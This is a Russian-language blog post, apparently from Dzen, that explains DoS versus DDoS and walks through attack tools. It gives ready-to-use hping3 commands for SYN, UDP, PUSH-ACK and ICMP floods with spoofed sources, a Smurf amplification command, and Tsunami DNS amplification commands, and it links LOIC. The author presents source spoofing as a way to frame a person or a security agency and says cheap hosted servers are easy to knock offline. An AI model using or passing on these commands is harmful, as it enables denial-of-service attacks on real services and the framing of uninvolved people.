Найти в Дзене
Данил Головащенко

Dos и DDos атаки

4
1 мин
Многие из вас не понимают разницу. Давайте усвоим это раз и навсегда :) Говоря максимально просто: Dos - атака, которая ведется с одной машины. DDos - атака, которая ведется с двух и более машин. Обычно производится с использованием ботнета* *Ботнет - это сеть компьютеров, зараженных вредоносным ПО, используя панель вы можете управлять всеми компьютерами за раз и заставлять их делать то, что вам нужно. Софт для Dos атак Начнем с классики. Утилита, которая меня в свое время очень поразила своим функционалом.  Смысл этой атаки таков: Можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию. Скачать hping3 hping3 с успехом проводит SYN-флуд на TCP-протокол соединения, а он как вы знаете обладает трехсторонним рукопожатием: hping3 -S --flood -V -p TARGET_PORT TARGET_SITE hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE UDP-флуд: hping3 --flood --rand-source --udp -p TARG

Многие из вас не понимают разницу. Давайте усвоим это раз и навсегда :)

Говоря максимально просто:

Dos - атака, которая ведется с одной машины.

DDos - атака, которая ведется с двух и более машин. Обычно производится с использованием ботнета*

*Ботнет - это сеть компьютеров, зараженных вредоносным ПО, используя панель вы можете управлять всеми компьютерами за раз и заставлять их делать то, что вам нужно.

Софт для Dos атак

Начнем с классики. Утилита, которая меня в свое время очень поразила своим функционалом. 

Смысл этой атаки таков:

Можно подставить любого человека или сами знаете какую силовую организацию в том что он(они) нападали на другую более серьезную организацию.

Скачать hping3

hping3 с успехом проводит SYN-флуд на TCP-протокол соединения, а он как вы знаете обладает трехсторонним рукопожатием:

hping3 -S --flood -V -p TARGET_PORT TARGET_SITE

hping3 -c 20000 -d 120 -S -w 64 -p TARGET_PORT --flood --rand-source TARGET_SITE

UDP-флуд:

hping3 --flood --rand-source --udp -p TARGET_PORT TARGET_IP

PUSH _ACK-флуд - если сервер раздразнить этим флудом, то он может обидеться и вообще перестать всех обслуживать:

hping3 --flood --rand-source -PA -p TARGET_PORT TARGET_IP

ICMP_IGMP-флуд - это малоэффективная атака, нужно проводить долго и не одному но все же укажу её:

hping3 --flood --rand-source -1 -p TARGET_PORT TARGET_IP

SMURF-флуд - это атака, при которой мы выбираем некоторые промежуточные сайты в качестве усилителей, а затем отправляем огромное количество запросов ICMP (ping) на эти промежуточные сайты для широковещательного IP-адреса. Таким образом, все исходные IP-адреса изменяются на целевые IP-адреса, которые передают эти пакеты хостам всех подсетей. Наконец, все ответы хоста отправляются обратно в цель:

hping3 --icmp --spoof TARGET_IP BROADCAST_IP

Те, кто давно в деле - помнят легенду, которая также проводит такие же атаки : TCP, UDP, HTTP.

Dark Times

СКАЧАТЬ LOIC

Так же существует еще одна утилита, которая достойна вашего внимания: Tsunami - DNS Amplification Attack Tool 

Скачать

/tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8

./tsunami -s TARGET_IP -n pentest.blog -p 3 -f recursive_dns.txt

Заключение

Сервак Google вы не отключите DoS атакой, необходима DDos атака с использованием очень крупного ботнета, а вот сервера, которые стоят 10-15$ в месяц - легко. На них, как правило, размещен всякого рода трэш и отчаянные попытки нажиться на простых людях.